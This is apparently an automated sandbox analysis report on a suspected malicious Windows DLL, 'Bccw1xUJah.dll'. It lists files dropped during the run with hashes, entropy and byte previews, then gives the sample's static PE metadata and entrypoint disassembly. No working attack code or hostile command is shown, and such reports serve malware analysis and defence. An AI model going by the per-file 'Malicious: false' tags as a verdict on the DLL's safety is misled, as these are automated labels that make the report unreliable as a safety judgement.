Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 622x368, frames 3
Category:	dropped
Size (bytes):	22695
Entropy (8bit):	7.810298738669907
Encrypted:	false
SSDEEP:	384:I/t2lp812AN13D4+f3G7VE3flChB9HKqXOymBVBWzTk1Uvhp3c6:I/uWAOEZelChB9H5ZOIz73z
MD5:	67E55E01B3746273C0D6440E0229464B
SHA1:	B0EFBEF2F457E3C497F77D9ACEFE845CD9446801
SHA-256:	4441E3858AFDA9EA55051473DF78DD2F23BF21CAD83492CBFF9C032CEBA1F657
SHA-512:	3FD344D0FF4B05BC3FCCC7CD291C5E93841DD620097AC82B5338663A2013DE39463C8E73A51C0DF504553646D9CC5C2721BEAB7B97576B3CE070017BA01CFCBA
Malicious:	false
Reputation:	unknown
Preview:	......JFIF.....`.`...................... .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO......p.n...........................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz......................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.....`V.a..c.....;...P..i....r?!w...H..Q.s..d......L.HpFH.(.>y..8...9Q.bS.P;..b.....BU..G....-.\......a.....u;q@.6.....c.........~`...p..^h......(..G.=.."vQ..P.`.y..@2x..,.d.VS..H,E#......B0\....l.....0D`.^(.'.$.).b.C..-L..#...=).X..0(.../=rh........ \|.@..'..@..8`@...........}....v.c.....z.!.g.....$.(...).U_\S..E+.AH.!.a.p(.0... ...;.0G..i..2$#s..h.....T.Xd..v0.U.A.._.z.R.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\BB1kKVy[1].png Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	PNG image data, 30 x 30, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	898
Entropy (8bit):	7.694927757951535
Encrypted:	false
SSDEEP:	24:AoSFwQNh8iuQ/HM5V7Wp7Cxf2aA5DbK1cbr:AoUNhtuQE59WpWx+a6Pl
MD5:	2FAD21634CA0EC2AEF0D32E72748CCFB
SHA1:	4D4727E108164985D0722A32035F58FA0BDAD19E
SHA-256:	A8FD087BD67E5CEBC1B90AB2E4DD94847B947B849EEBDE4E816DF54ABE66C589
SHA-512:	30D075B21AB5891C2FB8684DE64F784F0F65784307C36076ADB745131C0E9CABE89DFC5C74BC9BBF210620D1A525E9FAC1626BBB35B49946955C609378D3B185
Malicious:	false
Reputation:	unknown
Preview:	.PNG........IHDR.............;0......pHYs..........+.....4IDATx..]H.Q.....6.u!.t..)MQ'.e..S2e.Md^...F....cB.0...J..B.0..(J.4P.#J..A.................\|<.s...I.?.&...^p..w$....Q;...P..).G....n@0.........D.z=p..E...j......Z..E..Z$..;./....=RpR......z..'..)8'$si..(....!.]!..0...CVmH.Xp(...#..0Y.....&...t.b.`..3....P..._"...9....z.&''{;::../.......SoB...61].8..77..df......d..........KMMM....k..."?...w......$....Q?m..$..=/.w.Juw..xOnn.?...j5...+].W..bI.....?.v..bU......!.)..,w.>.sR.=.7[;...q.._...K..._.U...........\|.....P........[.}.;.o.{Ui....>.O...X..b1.........l{{.{~6.b...x..j....rS"...a/,4h....H.P...p.H.....}h4.2..E....0..fg.V.>..+....2D..D...j...d2-A1..R)sk..\^^..t:...lnll.s8..A`>.6.%.O..f...{`4.5II..4?S.g..j....!V..`....F.IK.B.v.rm...n........l@.T.c.9......C6...H8)....,.`.\.....0666.9*h.....?............j.>.8STl..G...t..P..6.....eO.......IEND.B`.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\BBK9Hzy[1].png Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	480
Entropy (8bit):	7.323791813342231
Encrypted:	false
SSDEEP:	12:6v/7BusWIjbykLNgdQLPhgZPwb6txC3nUPuZZcb:MW6bykxgSh6a6TCStb
MD5:	163E7CEBA4224A9D25813CD756D138CC
SHA1:	062FFF66A1E7C37BAE1ECE635034A03C54638D50
SHA-256:	14525F17E552171DEE6D57C932287048185BE36D9AC25DA79CB02AD00657DEAF
SHA-512:	C37D77C1414B75CE6E3A90087B3C1E9D57AF6BCA4C140F1F4F43503D89C849EE1143315260A4DF92F1DD273305C15121FF199C04E946FA3BBD98B9B1D6636069
Malicious:	false
Reputation:	unknown
Preview:	.PNG........IHDR................a....pHYs..........+......IDATx..R=H.Q.}...?....!... ..0h.B......!!.......h.j.........%i.J..%.5.:.._c.u.x.=....wQ...?.L.\E..] ...O.&.m..l.U.z..M6.....9.....(....3...x.O!3.....o&}.........].w....x..s.%..4.E.WX..{..!....4...2hB...c.m...]m0W."Y.,.2n.W..P.U.a .p...f.\gV....:0.4e........^s 4.j..0...u....t6....v..4...c8.4...0./i.Dh..../[t..h.5...!E$.....+..r..C.v......T<.....S..*z#.:...p.B.....").}R........=.....w.e......IEND.B`.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\BBPfCZL[1].png Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	GIF image data, version 89a, 50 x 50
Category:	dropped
Size (bytes):	2313
Entropy (8bit):	7.594679301225926
Encrypted:	false
SSDEEP:	48:5Zvh21Zt5SkY33fS+PuSsgSrrVi7X3ZgMjkCqBn9VKg3dPnRd:vkrrS333q+PagKk7X3ZgaI9kMpRd
MD5:	59DAB7927838DE6A39856EED1495701B
SHA1:	A80734C857BFF8FF159C1879A041C6EA2329A1FA
SHA-256:	544BA9B5585B12B62B01C095633EFC953A7732A29CB1E941FDE5AD62AD462D57
SHA-512:	7D3FB1A5CC782E3C5047A6C5F14BF26DD39B8974962550193464B84A9B83B4C42FB38B19BD0CEF8247B78E3674F0C26F499DAFCF9AF780710221259D2625DB86
Malicious:	false
Reputation:	unknown
Preview:	GIF89a2.2.....7..;..?..C..I..H..<..9.....8..F..7..E..@..C..@..6..9..8..J..z.G..>..?..A..6..>..8..:..A..=..B..4..B..D..=..K..=..@..<..:..3~.B..D.....,\|.4..2..6..:..J..;..G....Fl..1}.4..R.....Y..E..>..9..5..X..A..2..P..J../\|.9.....T.+Z.....+..<.Fq.Gn..V..;..7.Lr..W..C..<.Fp.]......A.....0{.L..E..H..@.....3..3..O..M..K....#[.3i..D..>........I....<n..;..Z..1..G..8..E....Hu..1..>..T..a.Fs..C..8..0}....;..6..t.Ft..5.Bi..:.x...E.....'z^~.......[....8`..........;..@..B.....7.....<.................F.....6...........>..?.n......g.......s...)a.Cm....'a.0Z..7....3f..<.:e.....@.q.....Ds..B....!P.n...J............Li..=......F.....B.....:r....w..\|..........`..[}.g...J.Ms..K.Ft.....'..>..........Ry.Nv.n..]..Bl........S..;....Dj.....=.....O.y.......6..J.......)V..g..5.......!..NETSCAPE2.0.....!...d...,....2.2........3.`..9.(\|.d.C .wH.(."D...(D.....d.Y......<.(PP.F...dL.@.&.28..$1S....TP......>...L..!T.X!.(..@a..IsgM..\|..Jc(Q.+.......2.:.)y2.J......W,..eW2.!....!....C.....d...zeh....P.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\BBX2afX[1].png Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	PNG image data, 27 x 27, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	879
Entropy (8bit):	7.684764008510229
Encrypted:	false
SSDEEP:	24:nbwTOG/D9S9kmVgvOc0WL9P9juX7wlA3lrvfFRNa:bwTOk5S96vBB1jGwO3lzfxa
MD5:	4AAAEC9CA6F651BE6C54B005E92EA928
SHA1:	7296EC91AC01A8C127CD5B032A26BBC0B64E1451
SHA-256:	90396DF05C94DD44E772B064FF77BC1E27B5025AB9C21CE748A717380D4620DD
SHA-512:	09E0DE84657F2E520645C6BE20452C1779F6B492F67F88ABC7AB062D563C060AE51FC1E99579184C274AC3805214B6061AEC1730F72A6445AEBDB7E9F255755F
Malicious:	false
Reputation:	unknown
Preview:	.PNG........IHDR................U....pHYs..........+.....!IDATx...K.Q..wfv.u......,I"...)...z............>.OVObQ......d?\|.....F.QI$....qf.s.....">y`......{~.6.Z.`.D[&.cV`..-8i...J.S.N..xf.6@.v.(E..S.....&...T...?.X)${.....s.l."V..r...PJ!..p.4b}.=2...[......:.....LW3...A.eB.;...2...~...s_z.x\|..o....+..x....KW.G2..9.....<.\....gv...n..1..0...1}....Ht_A.x...D..5.H.......W..$_\G.e;./.1R+v....j.6v........z.k............&..(....,F.u8^..v...d-.j?.w..;..O.<9$..A..f.k.Kq9..N..p.rP2K.0.).X.4..Uh[..8..h....O..V.%.f.......G..U.m.6$......X....../.=....f:.......\|c(,.......l.\..<./..6...!...z(......# "S..f.Q.N=.0VQ._..\|....>@....P.7T.$./)s....Wy..8..xV......D....8r."b@....:.E.E......._(....4w....Ir..e-5..zjg...e?./...\|X..."!..'/......OI..J"I.MP....#...G.Vc..E..m.....wS.&.K<...Kq..\...A..$.K......,...[..D...8.?..)..3....IEND.B`.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\de-ch[1].htm Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	HTML document, UTF-8 Unicode text, with very long lines, with CRLF, LF line terminators
Category:	dropped
Size (bytes):	426962
Entropy (8bit):	5.437017395709147
Encrypted:	false
SSDEEP:	3072:/fP3JUExx+lAkJ8Jia4TJM4qX4DGgwwStK+9kZwcLtsiTUsAK51t2PDfdLU:/ffVOlw7Sw25asILf+
MD5:	C4F115B993E373B2BFC29AEF434EFB02
SHA1:	B3B05D82602A16968816DCEAA4BB1D968CD7543D
SHA-256:	2A7F881E0204ADBEE3FE0585222BCFE93691BC27C4454C322F382FB09E844CD4
SHA-512:	D1B95DCCBD3E2C0A500483E0A8989D53510B164A5BE8348BB4869AFBD57695D1D85FE82846BB3D1B994B8F4094ED61880F0E140BD588AC3294743AF551DCBCFB
Malicious:	false
Reputation:	unknown
Preview:	<!DOCTYPE html><html prefix="og: http://ogp.me/ns# fb: http://ogp.me/ns/fb#" lang="de-CH" class="hiperf" dir="ltr" >.. <head data-info="v:20211130_25944225;a:bdb79e30-1845-46f8-a9a4-ff8a28bab829;cn:20;az:{did:2be360ae5c6345da911d978376c0449f, rid: 20, sn: neurope-prod-hp, dt: 2021-11-29T21:22:00.9879586Z, bt: 2021-11-30T01:14:54.5479932Z};ddpi:1;dpio:;dpi:1;dg:tmx.pc.ms.ie10plus;th:start;PageName:startPage;m:de-ch;cb:;l:de-ch;mu:de-ch;ud:{cid:,vk:homepage,n:,l:de-ch,ck:};xd:BBqgbZW;ovc:f;al:;fxd:f;xdpub:2021-08-11 10:21:32Z;xdmap:2021-12-02 23:41:36Z;axd:;f:msnallexpusers,muidflt13cf,muidflt16cf,muidflt17cf,muidflt28cf,muidflt51cf,muidflt58cf,muidflt261cf,muidflt314cf,bingcollabedge3cf,pnehp3cf,bingcollabhp2cf,artgly1cf,artgly2cf,artgly4cf,gallery5cf,onetrustpoplive,msnapp1cf,1s-bing-news,vebudumu04302020,bbh20200521msn,1s-br30min,btrecrow1,1s-winauthservice,1s-winsegservice,weather10cf,prong2t,1s-pagesegservice;userOptOut:false;userOptOutOptions:" data-js="{"dpi":1.0

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\jquery-2.1.1.min[1].js Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	84249
Entropy (8bit):	5.369991369254365
Encrypted:	false
SSDEEP:	1536:DPEkjP+iADIOr/NEe876nmBu3HvF38NdTuJO1z6/A4TqAub0R4ULvguEhjzXpa9r:oNM2Jiz6oAFKP5a98HrY
MD5:	9A094379D98C6458D480AD5A51C4AA27
SHA1:	3FE9D8ACAAEC99FC8A3F0E90ED66D5057DA2DE4E
SHA-256:	B2CE8462D173FC92B60F98701F45443710E423AF1B11525A762008FF2C1A0204
SHA-512:	4BBB1CCB1C9712ACE14220D79A16CAD01B56A4175A0DD837A90CA4D6EC262EBF0FC20E6FA1E19DB593F3D593DDD90CFDFFE492EF17A356A1756F27F90376B650
Malicious:	false
Reputation:	unknown
Preview:	/! jQuery v2.1.1 \| (c) 2005, 2014 jQuery Foundation, Inc. \| jquery.org/license /..!function(a,b){"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){var c=[],d=c.slice,e=c.concat,f=c.push,g=c.indexOf,h={},i=h.toString,j=h.hasOwnProperty,k={},l=a.document,m="2.1.1",n=function(a,b){return new n.fn.init(a,b)},o=/^[\s\uFEFF\xA0]+\|[\s\uFEFF\xA0]+$/g,p=/^-ms-/,q=/-([\da-z])/gi,r=function(a,b){return b.toUpperCase()};n.fn=n.prototype={jquery:m,constructor:n,selector:"",length:0,toArray:function(){return d.call(this)},get:function(a){return null!=a?0>a?this[a+this.length]:this[a]:d.call(this)},pushStack:function(a){var b=n.merge(this.constructor(),a);return b.prevObject=this,b.context=this.context,b},each:function(a,b){return n.each(this,a,b)},map:function(a){return this.pushStack(n.map(this,funct

C:\Users\user\AppData\Local\Temp\~DF1A577BCFE6731D96.TMP Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	16384
Entropy (8bit):	0.08524844069995487
Encrypted:	false
SSDEEP:	3:11whwM1P/b5gdtg/lclllv/nt+lybltll1lRslkhlEkllKIxx6Stq:/UzPNgdtgUFAlkx7ds
MD5:	03B22A2094965F3EEC2018075D9D9F24
SHA1:	1A234F96957936080DC9DCD3D3869D6CDD6B8E0D
SHA-256:	2E33C98F48F45BE3BD44311E482127392BE05049D030D58E37AE20FC2BA02817
SHA-512:	2C21F13A3EE768628CF3C6A3C80437ED346BED22B0851AB613FE65487887F52C503DDEC1F6DD07097691B378E844E5FB19D1D7C48DE0D86D06B71FBEDA753FA2
Malicious:	false
Reputation:	unknown
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DF9599588B5779AF51.TMP Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	16384
Entropy (8bit):	0.06045461972774207
Encrypted:	false
SSDEEP:	3:alFXEAUolllfltE3lX9/Dl/Oly3lgHl0llftRslkhlEkllM+lylhllAlFJejl+lE:a/vllsngF0/AlkxFIBGKjEW1
MD5:	9FFCF967410609EAB508F254E7CA6AA2
SHA1:	061671A355104728137C16CDEC077B7312545F36
SHA-256:	A3EC8754D1131E7E3F9E35A5EA52257B5CAE7686F3F4355DA048AC16F4A30E98
SHA-512:	11D215E25AFE2EB70C54C54C6B4E3125382C842324889FFC15E1B9F0E333C04473E9A8EED6FBDA0C09478693811EF46EFE97A16D08209EF00496B98AFD6B6973
Malicious:	false
Reputation:	unknown
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DFA7B565ABAC8E893D.TMP Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	176128
Entropy (8bit):	3.342711780029563
Encrypted:	false
SSDEEP:	3072:oZ/2Bfcdmu5kgTzGt6Z/2Bfc+mu5kgTzGt:BB
MD5:	478C9E1F691F0F74ED97B9898C644843
SHA1:	C17D0108C40DD9B82DE801416268908C9BCD51AE
SHA-256:	CD86D84E1BB56F8CCE5E1E4621DA2A784E612286E11AB92AE8AD4EE95EFC61A3
SHA-512:	C2DBDE45CD87CB5CF792196003CC819D226658C67F22E3D8C7A754BB8A66BDB751F741A646C2C4CB39B5D802075CE451F999287AC07EAF1DDB567DFA25B2422A
Malicious:	false
Reputation:	unknown
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp Download File
Process:	C:\Windows\System32\svchost.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	55
Entropy (8bit):	4.306461250274409
Encrypted:	false
SSDEEP:	3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
MD5:	DCA83F08D448911A14C22EBCACC5AD57
SHA1:	91270525521B7FE0D986DB19747F47D34B6318AD
SHA-256:	2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
SHA-512:	96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
Malicious:	false
Reputation:	unknown
Preview:	{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\MpCmdRun.log Download File
Process:	C:\Program Files\Windows Defender\MpCmdRun.exe
File Type:	Little-endian UTF-16 Unicode text, with CRLF, CR line terminators
Category:	modified
Size (bytes):	7250
Entropy (8bit):	3.1656392236434323
Encrypted:	false
SSDEEP:	96:cEj+AbCEH+AbuEAc+AbhGEA+AbNEe+Ab/Ee+AbPE6w9+Ab1wTEEs+Ab3y:cY+38+DJc+iGr+MZ+65+6tg+ECk+v
MD5:	500A0BEDCBE89DD088B9FBB72E49F841
SHA1:	826F587A55FBD5C1DE90795C884A2B9F167AE98C
SHA-256:	88CF82074168E904088D5437C57C6E2DBD38671897F7C73068EDD42B829E3003
SHA-512:	43D155BB14C024DE26A468ED68E32F5CC7B18EDAD995012A36C573D2D1B53912CDF4C4C254DF3B3157F20A6291A82F9A344B041C0B92FBD507C25C683BD4076C
Malicious:	false
Reputation:	unknown
Preview:	..........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....M.p.C.m.d.R.u.n.:. .C.o.m.m.a.n.d. .L.i.n.e.:. .".C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.m.p.c.m.d.r.u.n...e.x.e.". .-.w.d.e.n.a.b.l.e..... .S.t.a.r.t. .T.i.m.e.:. .. T.h.u. .. J.u.n. .. 2.7. .. 2.0.1.9. .0.1.:.2.9.:.4.9.........M.p.E.n.s.u.r.e.P.r.o.c.e.s.s.M.i.t.i.g.a.t.i.o.n.P.o.l.i.c.y.:. .h.r. .=. .0.x.1.....W.D.E.n.a.b.l.e.....E.R.R.O.R.:. .M.p.W.D.E.n.a.b.l.e.(.T.R.U.E.). .f.a.i.l.e.d. .(.8.0.0.7.0.4.E.C.).....M.p.C.m.d.R.u.n.:. .E.n.d. .T.i.m.e.:. .. T.h.u. .. J.u.n. .. 2.7. .. 2.0.1.9. .0.1.:.2.9.:.4.9.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.............-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\DeliveryOptimization\Logs\dosvc.20211203_084238_999.etl Download File
Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	12288
Entropy (8bit):	3.7884673799738064
Encrypted:	false
SSDEEP:	96:GCaCBgo+r/5XD9YE/Y4VCTTCI2lnfkQc4s+T2UgjFz4NMCBdJRupj5pNMCvFj59t:lylVs529k1CF3Cv9kCNCeCECo
MD5:	65D4E3B952A322EAB131E1297B1AB831
SHA1:	C8D371B0D1AAE7CD0F05A69B5453295C5AFBD3B2
SHA-256:	B32A26106162C46415103F82C6B4BC9220EA06F8733A2E62AAD9D98E0C8A3552
SHA-512:	F5FF7345201D65B03B5D9C1955A1D99FF3DF33A30DC4C9D16FAF9E1E4EB64FCA2CE07D1682B97D90830526909E581A1FD82B81033B480D4DC35975B56EF54026
Malicious:	false
Reputation:	unknown
Preview:	.... ... ....................................... ...!....................................1.......................B..............Zb... ... ..........................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1............................................................./_8..... .....vSt.!...........8.6.9.6.E.A.C.4.-.1.2.8.8.-.4.2.8.8.-.A.4.E.E.-.4.9.E.E.4.3.1.B.0.A.D.9...C.:.\.W.i.n.d.o.w.s.\.S.e.r.v.i.c.e.P.r.o.f.i.l.e.s.\.N.e.t.w.o.r.k.S.e.r.v.i.c.e.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.M.i.c.r.o.s.o.f.t.\.W.i.n.d.o.w.s.\.D.e.l.i.v.e.r.y.O.p.t.i.m.i.z.a.t.i.o.n.\.L.o.g.s.\.d.o.s.v.c...2.0.2.1.1.2.0.3._.0.8.4.2.3.8._.9.9.9...e.t.l.........P.P..........1......................................................................................................................................................................................................................................................................

C:\Windows\appcompat\Programs\Amcache.hve Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1572864
Entropy (8bit):	4.26547790399835
Encrypted:	false
SSDEEP:	12288:oLYqzwGk244B5PNNCEKXWiSJjihQhaTeDiXq8KOntknWXyrULWDqWcJ9:oYqzwGk244B5PNNUfpr9
MD5:	BE2174AD7A8605149FE32856CD963C94
SHA1:	DE8E3156996E4D177492273FCE5C3AF5D90580D1
SHA-256:	F659C39891FACCE6196DC5EBC1D2E69E6AB7BECDBC8ABC32F5E09F6D56220D8A
SHA-512:	6C239F99E6BFCBE53E15E9124F5321F75796DCD9C1F6BC4EC5C2526DBB8673BF149AA186B8DA1AD88C5654E4097F808DD37029981BEE4BDD3FE15671438B7D7B
Malicious:	false
Reputation:	unknown
Preview:	regfQ...Q...p.\..,.................. ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e...4............E.4............E.....5............E.rmtm.P..!...............................................................................................................................................................................................................................................................................................................................................o..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\appcompat\Programs\Amcache.hve.LOG1 Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	16384
Entropy (8bit):	3.049878916673503
Encrypted:	false
SSDEEP:	192:1SErZV1N+CsEd4Yw5FSE9lMqXyQVWnxuYW2oQKqe8mxwp1uN57:1J985TXQnxuf2oQPmxwp1uN57
MD5:	EF3C13416F984D253533825BE01C2C17
SHA1:	11770C267845EF116FC23A282F1212D1BFA94F54
SHA-256:	3197029C9CF871064115B7DFCC1630F7A69267AB87791B94218C412FBD447068
SHA-512:	DCFCC3D742269A1D5B7076B40233948C8C5357CC70A41121B7535DF34EE3212600BA2D00A10EA970062F473A86B02B2A06427A78F64E8A0327A38743956B7AA3
Malicious:	false
Reputation:	unknown
Preview:	regfP...P...p.\..,.................. ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e...4............E.4............E.....5............E.rmtm.P..!...............................................................................................................................................................................................................................................................................................................................................i..HvLE.>......P............s.......F.U..........................hbin................p.\..,..........nk,.....!.......H........................... ...........................&...{ad79c032-a2ea-f756-e377-72fb9332c3ae}......nk .....!....... ...........P............... .......Z.......................Root........lf......Root....nk .....!....................}.............. ...............*...............DeviceCensus.......................vk..................WritePermissionsCheck.......p...

Static File Info

General
File type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.726185656435229
TrID:	Win32 Dynamic Link Library (generic) (1002004/3) 99.60% Generic Win/DOS Executable (2004/3) 0.20% DOS Executable Generic (2002/1) 0.20% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	Bccw1xUJah.dll
File size:	829440
MD5:	fbe56ca46b61fa3008caa98e6f4a917a
SHA1:	ec752c16c271384004ad3dc4a25d6fbf52b2bcb8
SHA256:	a46566a9cae02c1b04da80f4ff402727eb41ed0d8c0ab8f837a10d68cfa4f61b
SHA512:	d3b3f17437f719f4c0f803f3ebc9c41f93060ffdb615d2c9f1b1f7377f9f97546cc37eb3defdeae72635ba59e5d6a4ba7b0a8511ab429778fcb09288c026fc3b
SSDEEP:	12288:5e62IbUp6cgHVysjTEs0auETHl4GbOX4NNVjmFuu4I7Sk4BwhWyy6W0WTbh/Q:5e6T06hHXEYHl4GbOX4NN0V77syET9/
File Content Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.........#.I.M.I.M.I.M.].N.].M.].H...M.].I.^.M.].L.J.M.I.L...M...I.F.M...N.^.M...H...M...I.N.M...N.H.M...H.E.M...H.{.M...I.\.M...M.H.M

File Icon


Icon Hash:	74f0e4ecccdce0e4

Static PE Info

General
Entrypoint:	0x10086b9b
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x10000000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x61A8811A [Thu Dec 2 08:17:30 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	e1cf68522b8503bd17e1cb390e0c543b

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
cmp dword ptr [ebp+0Ch], 01h
jne 00007F03747BE387h
call 00007F03747BEAC5h
push dword ptr [ebp+10h]
push dword ptr [ebp+0Ch]
push dword ptr [ebp+08h]
call 00007F03747BE233h
add esp, 0Ch
pop ebp
retn 000Ch
int3
int3
push ebx
push edi
xor edi, edi
mov eax, dword ptr [esp+10h]
or eax, eax
jnl 00007F03747BE396h
inc edi
mov edx, dword ptr [esp+0Ch]
neg eax
neg edx
sbb eax, 00000000h
mov dword ptr [esp+10h], eax
mov dword ptr [esp+0Ch], edx
mov eax, dword ptr [esp+18h]
or eax, eax
jnl 00007F03747BE395h
mov edx, dword ptr [esp+14h]
neg eax
neg edx
sbb eax, 00000000h
mov dword ptr [esp+18h], eax
mov dword ptr [esp+14h], edx
or eax, eax
jne 00007F03747BE39Dh
mov ecx, dword ptr [esp+14h]
mov eax, dword ptr [esp+10h]
xor edx, edx
div ecx
mov eax, dword ptr [esp+0Ch]
div ecx
mov eax, edx
xor edx, edx
dec edi
jns 00007F03747BE3D0h
jmp 00007F03747BE3D5h
mov ebx, eax
mov ecx, dword ptr [esp+14h]
mov edx, dword ptr [esp+10h]
mov eax, dword ptr [esp+0Ch]
shr ebx, 1
rcr ecx, 1
shr edx, 1
rcr eax, 1
or ebx, ebx
jne 00007F03747BE376h
div ecx
mov ecx, eax
mul dword ptr [esp+18h]
xchg eax, ecx
mul dword ptr [esp+14h]
add edx, ecx
jc 00007F03747BE390h
cmp edx, dword ptr [esp+10h]
jnbe 00007F03747BE38Ah
jc 00007F03747BE390h
cmp eax, dword ptr [esp+0Ch]
jbe 00007F03747BE38Ah
sub eax, dword ptr [esp+14h]
sbb edx, dword ptr [esp+18h]
sub eax, dword ptr [esp+0Ch]
sbb edx, dword ptr [esp+10h]

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0xb8ec0	0x738	.rdata
IMAGE_DIRECTORY_ENTRY_IMPORT	0xb95f8	0x28	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x0	0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xca000	0x33c8	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0xb7080	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0xb70a0	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0xa7000	0x14c	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
